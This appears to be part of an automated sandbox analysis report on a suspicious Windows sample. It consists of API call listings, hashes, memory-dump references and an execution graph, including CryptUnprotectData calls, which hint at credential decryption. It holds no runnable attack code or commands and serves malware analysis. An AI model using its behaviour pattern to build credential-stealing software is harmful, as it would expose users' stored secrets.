                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-4083868402
                                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403A1A,75573420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-4083868402
                                                                                                            • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                            • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 7014116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701411C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701411D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70141203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: d834425ae3be495308c6e459d3728c7e6a5ea9b0b08c2329119b2078aea64dbd
                                                                                                            • Instruction ID: 610d53d8ba02072c99f0d4b72ff41a7541aacf3db57b211f0cf91b19fe8140ad
                                                                                                            • Opcode Fuzzy Hash: d834425ae3be495308c6e459d3728c7e6a5ea9b0b08c2329119b2078aea64dbd
                                                                                                            • Instruction Fuzzy Hash: 7931AEB65002019FD3008F75DD55A2E7BF8EB46710732152AFE46DBB35EB74E8018BA0
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12.1%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.1%
                                                                                                            Total number of Nodes:290
                                                                                                            Total number of Limit Nodes:18
                                                                                                            execution_graph 43794 37b1ce60 43795 37b1ce7c 43794->43795 43798 37b19544 43795->43798 43797 37b1ce9b 43799 37b1954f 43798->43799 43800 37b1cf4f 43799->43800 43803 37b1d370 43799->43803 43807 37b1d360 43799->43807 43800->43797 43805 37b1d39e 43803->43805 43804 37b1d429 43805->43804 43811 37b1962c 43805->43811 43809 37b1d36f 43807->43809 43808 37b1d429 43808->43808 43809->43808 43810 37b1962c 2 API calls 43809->43810 43810->43808 43812 37b19637 43811->43812 43814 37b1f04f 43812->43814 43815 37b1ebd4 43812->43815 43814->43804 43817 37b1ebdf 43815->43817 43816 37b1f119 43816->43814 43817->43816 43818 37b1fab8 2 API calls 43817->43818 43819 37b1faa8 2 API calls 43817->43819 43818->43816 43819->43816 43820 38182020 SetTimer 43821 3818208c 43820->43821 43822 381820c0 43823 381820ed 43822->43823 43824 3818213c 43823->43824 43826 381818ac 43823->43826 43824->43824 43827 381818b7 43826->43827 43832 38181874 43827->43832 43829 3818229c 43831 37b1962c 2 API calls 43829->43831 43830 381822a5 43830->43824 43831->43830 43833 3818187f 43832->43833 43836 381818cc 43833->43836 43835 381822f5 43835->43829 43837 381818d7 43836->43837 43838 3818248b 43837->43838 43839 38182461 GetCurrentThreadId 43837->43839 43838->43835 43839->43838 43840 ad030 43841 ad048 43840->43841 43842 ad0a2 43841->43842 43848 381802b8 43841->43848 43853 38181bc1 43841->43853 43864 381803f0 43841->43864 43867 38181bd0 43841->43867 43878 381802c8 43841->43878 43849 381802ee 43848->43849 43851 38181bd0 2 API calls 43849->43851 43852 38181bc1 2 API calls 43849->43852 43850 3818030f 43850->43842 43851->43850 43852->43850 43854 38181bd0 43853->43854 43855 38181c31 43854->43855 43857 38181c21 43854->43857 43917 38181854 43855->43917 43858 38181c2f 43857->43858 43883 38189d78 43857->43883 43888 38189e44 43857->43888 43894 38181d48 43857->43894 43903 38181d58 43857->43903 43912 38189d68 43857->43912 43865 38180407 43864->43865 43931 38180840 43864->43931 43865->43842 43868 38181bfd 43867->43868 43869 38181c31 43868->43869 43871 38181c21 43868->43871 43870 38181854 CallWindowProcW 43869->43870 43872 38181c2f 43870->43872 43871->43872 43873 38189d78 CallWindowProcW 43871->43873 43874 38189d68 CallWindowProcW 43871->43874 43875 38181d58 2 API calls 43871->43875 43876 38181d48 2 API calls 43871->43876 43877 38189e44 CallWindowProcW 43871->43877 43873->43872 43874->43872 43875->43872 43876->43872 43877->43872 43879 381802ee 43878->43879 43881 38181bd0 2 API calls 43879->43881 43882 38181bc1 2 API calls 43879->43882 43880 3818030f 43880->43842 43881->43880 43882->43880 43884 38189d8c 43883->43884 43921 38189e30 43884->43921 43924 38189e20 43884->43924 43885 38189e18 43885->43858 43889 38189e52 43888->43889 43890 38189e02 43888->43890 43892 38189e30 CallWindowProcW 43890->43892 43893 38189e20 CallWindowProcW 43890->43893 43891 38189e18 43891->43858 43892->43891 43893->43891 43895 38181d58 43894->43895 43896 38181d66 43895->43896 43898 38181d98 43895->43898 43897 38181d6e 43896->43897 43900 38181854 CallWindowProcW 43896->43900 43897->43858 43899 38181874 GetCurrentThreadId 43898->43899 43901 38181da4 43899->43901 43902 38181dac 43900->43902 43901->43858 43902->43858 43904 38181d93 43903->43904 43905 38181d66 43903->43905 43904->43905 43906 38181d98 43904->43906 43908 38181854 CallWindowProcW 43905->43908 43911 38181d6e 43905->43911 43907 38181874 GetCurrentThreadId 43906->43907 43909 38181da4 43907->43909 43910 38181dac 43908->43910 43909->43858 43910->43858 43911->43858 43914 38189d8c 43912->43914 43913 38189e18 43913->43858 43915 38189e30 CallWindowProcW 43914->43915 43916 38189e20 CallWindowProcW 43914->43916 43915->43913 43916->43913 43918 3818185f 43917->43918 43919 38181e5a CallWindowProcW 43918->43919 43920 38181e09 43918->43920 43919->43920 43920->43858 43922 38189e41 43921->43922 43928 3818aff0 43921->43928 43922->43885 43925 38189e30 43924->43925 43926 38189e41 43925->43926 43927 3818aff0 CallWindowProcW 43925->43927 43926->43885 43927->43926 43929 38181854 CallWindowProcW 43928->43929 43930 3818b00a 43929->43930 43930->43922 43932 38180856 43931->43932 43933 38180938 10 API calls 43931->43933 43935 38180928 43931->43935 43932->43865 43933->43932 43936 38180948 43935->43936 43937 38180965 43936->43937 43938 38180980 6 API calls 43936->43938 43939 38180971 6 API calls 43936->43939 43937->43932 43938->43937 43939->43937 43583 15b158 43584 15b174 43583->43584 43590 37a60188 43584->43590 43594 37a60198 43584->43594 43585 15b1a3 43598 38182730 43585->43598 43591 37a601a4 43590->43591 43604 37a6c638 43591->43604 43592 37a601da 43592->43585 43595 37a601a4 43594->43595 43597 37a6c638 CryptUnprotectData 43595->43597 43596 37a601da 43596->43585 43597->43596 43599 3818273f 43598->43599 43636 38180938 43599->43636 43606 37a6c631 43604->43606 43605 37a6caf9 43605->43592 43606->43604 43606->43605 43608 37a6cf01 43606->43608 43609 37a6cf10 43608->43609 43613 37a6d540 43609->43613 43621 37a6d550 43609->43621 43610 37a6cf80 43610->43606 43614 37a6d550 43613->43614 43617 37a6d629 43614->43617 43619 37a6d540 CryptUnprotectData 43614->43619 43620 37a6d550 CryptUnprotectData 43614->43620 43629 37a6d730 43614->43629 43633 37a6d1ec 43617->43633 43619->43617 43620->43617 43622 37a6d575 43621->43622 43625 37a6d629 43621->43625 43622->43625 43626 37a6d730 CryptUnprotectData 43622->43626 43627 37a6d540 CryptUnprotectData 43622->43627 43628 37a6d550 CryptUnprotectData 43622->43628 43623 37a6d1ec CryptUnprotectData 43624 37a6d7f5 43623->43624 43624->43610 43625->43623 43626->43625 43627->43625 43628->43625 43630 37a6d745 43629->43630 43631 37a6d1ec CryptUnprotectData 43630->43631 43632 37a6d7f5 43631->43632 43632->43617 43634 37a6d9e0 CryptUnprotectData 43633->43634 43635 37a6d7f5 43634->43635 43635->43610 43637 38180948 43636->43637 43638 38180965 43637->43638 43645 38180980 43637->43645 43657 38180971 43637->43657 43641 3818193c 43638->43641 43642 38181947 43641->43642 43680 381819e4 43642->43680 43644 38182825 43644->43644 43646 381809c6 GetCurrentProcess 43645->43646 43648 38180a18 GetCurrentThread 43646->43648 43649 38180a11 43646->43649 43650 38180a4e 43648->43650 43651 38180a55 GetCurrentProcess 43648->43651 43649->43648 43650->43651 43652 38180a8b 43651->43652 43669 38180f31 43652->43669 43671 38180b51 43652->43671 43653 38180ab3 GetCurrentThreadId 43654 38180ae4 43653->43654 43654->43638 43658 381809c6 GetCurrentProcess 43657->43658 43660 38180a18 GetCurrentThread 43658->43660 43661 38180a11 43658->43661 43662 38180a4e 43660->43662 43663 38180a55 GetCurrentProcess 43660->43663 43661->43660 43662->43663 43664 38180a8b 43663->43664 43667 38180f31 43664->43667 43668 38180b51 2 API calls 43664->43668 43665 38180ab3 GetCurrentThreadId 43666 38180ae4 43665->43666 43666->43638 43667->43665 43668->43665 43670 38180f4e 43669->43670 43670->43653 43675 38180bc8 DuplicateHandle 43671->43675 43677 38180bc1 43671->43677 43672 38180b8e 43672->43653 43676 38180c5e 43675->43676 43676->43672 43678 38180bc8 DuplicateHandle 43677->43678 43679 38180c5e 43678->43679 43679->43672 43686 381819ef 43680->43686 43681 38182e79 43682 38182ea9 43681->43682 43684 38182b7c 11 API calls 43681->43684 43688 38182ed4 43682->43688 43698 38182b7c 43682->43698 43684->43682 43685 38182ec1 43704 3818d6e8 43685->43704 43711 3818d6d8 43685->43711 43686->43681 43687 38182fdc 43686->43687 43692 38184248 43686->43692 43687->43644 43693 38184269 43692->43693 43694 3818428d 43693->43694 43718 381843e9 43693->43718 43724 381843f8 43693->43724 43730 38184450 43693->43730 43694->43681 43699 38182b87 43698->43699 43700 3818d181 43699->43700 43701 38180938 10 API calls 43699->43701 43700->43685 43702 3818d19b 43701->43702 43784 3818c5fc 43702->43784 43706 3818d74d 43704->43706 43705 3818d79a 43705->43688 43706->43705 43707 3818d979 43706->43707 43709 3818dbb0 WaitMessage 43706->43709 43791 3818c6c4 43706->43791 43708 38180938 10 API calls 43707->43708 43708->43705 43709->43706 43713 3818d6d4 43711->43713 43712 3818d79a 43712->43688 43713->43711 43713->43712 43714 3818d979 43713->43714 43716 3818dbb0 WaitMessage 43713->43716 43717 3818c6c4 DispatchMessageW 43713->43717 43715 38180938 10 API calls 43714->43715 43715->43712 43716->43713 43717->43713 43719 38184400 43718->43719 43720 38180938 10 API calls 43719->43720 43721 38184433 43720->43721 43723 3818443e 43721->43723 43739 381835a8 43721->43739 43723->43694 43725 38184400 43724->43725 43726 38180938 10 API calls 43725->43726 43727 38184433 43726->43727 43728 3818443e 43727->43728 43729 381835a8 12 API calls 43727->43729 43728->43694 43729->43728 43732 38184453 43730->43732 43734 38184400 43730->43734 43731 38180938 10 API calls 43733 38184433 43731->43733 43735 381835dc 12 API calls 43732->43735 43738 381844b0 43732->43738 43736 381835a8 12 API calls 43733->43736 43737 3818443e 43733->43737 43734->43731 43735->43738 43736->43737 43737->43694 43738->43738 43740 381835b3 43739->43740 43742 381844b0 43740->43742 43743 381835dc 43740->43743 43742->43742 43744 381835e7 43743->43744 43750 381835ec 43744->43750 43746 3818451f 43754 38189412 43746->43754 43760 38189420 43746->43760 43747 38184559 43747->43742 43753 381835f7 43750->43753 43751 381856c0 43751->43746 43752 38184248 12 API calls 43752->43751 43753->43751 43753->43752 43755 381893bf 43754->43755 43757 3818941a 43754->43757 43756 3818945d 43756->43747 43757->43756 43766 37b1fab8 43757->43766 43771 37b1faa8 43757->43771 43762 38189451 43760->43762 43763 38189551 43760->43763 43761 3818945d 43761->43747 43762->43761 43764 37b1fab8 2 API calls 43762->43764 43765 37b1faa8 2 API calls 43762->43765 43763->43747 43764->43763 43765->43763 43768 37b1fae3 43766->43768 43767 37b1fb92 43768->43767 43776 381800b0 43768->43776 43780 381800c0 43768->43780 43772 37b1fab8 43771->43772 43773 37b1fb92 43772->43773 43774 381800b0 2 API calls 43772->43774 43775 381800c0 2 API calls 43772->43775 43774->43773 43775->43773 43778 38180110 CreateWindowExW 43776->43778 43779 38180104 CreateWindowExW 43776->43779 43777 381800f5 43777->43767 43778->43777 43779->43777 43781 381800f5 43780->43781 43782 38180110 CreateWindowExW 43780->43782 43783 38180104 CreateWindowExW 43780->43783 43781->43767 43782->43781 43783->43781 43785 3818c607 43784->43785 43787 3818d49b 43785->43787 43788 3818c618 43785->43788 43787->43700 43789 3818d4d0 OleInitialize 43788->43789 43790 3818d534 43789->43790 43790->43787 43792 3818e7e8 DispatchMessageW 43791->43792 43793 3818e854 43792->43793 43793->43706

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 510 3818e8a8-3818e8d3 511 3818e8da-3818e93a 510->511 512 3818e8d5 510->512 514 3818ec6d-3818ec95 511->514 515 3818e940-3818ea51 511->515 512->511 518 3818ec9b-3818ecc8 514->518 519 3818f420-3818f448 514->519 557 3818ea7b 515->557 558 3818ea53-3818ea5f 515->558 523 3818ecce-3818eed2 518->523 524 3818efc6-3818f331 518->524 526 3818f44e-3818f625 519->526 527 3818f6e1 519->527 626 3818eeeb-3818eefc 523->626 627 3818eed4-3818eee9 523->627 671 3818f34a-3818f35b 524->671 672 3818f333-3818f348 524->672 686 3818f62b call 15324d 526->686 687 3818f62b call 153168 526->687 528 3818f6e2-3818f6e9 527->528 560 3818ea81-3818ec23 557->560 561 3818ea69-3818ea6f 558->561 562 3818ea61-3818ea67 558->562 639 3818ec32-3818ec33 560->639 640 3818ec25-3818ec31 560->640 565 3818ea79 561->565 562->565 565->560 633 3818eefd-3818efc1 626->633 627->633 630 3818f630-3818f6af call 37b1cc28 652 3818f6b4-3818f6b6 630->652 663 3818f41f 633->663 639->514 640->639 652->528 663->519 675 3818f35c-3818f41e 671->675 672->675 675->663 686->630 687->630
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 0-967804232
                                                                                                            • Opcode ID: e3f05baf0dabdd1d260c16ed2955be476f0aa9cc6bfbc76a40072a83def95640
                                                                                                            • Instruction ID: d9d0f5eb84346d8f30c3f05b8874a9bb03c743f7f63ad48e83f7ca9f9aeb05f2
                                                                                                            • Opcode Fuzzy Hash: e3f05baf0dabdd1d260c16ed2955be476f0aa9cc6bfbc76a40072a83def95640
                                                                                                            • Instruction Fuzzy Hash: C382A374A00268CFDB25DF64D894BA9B7B2FB89305F5081E9D90AB7350DB319E82DF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
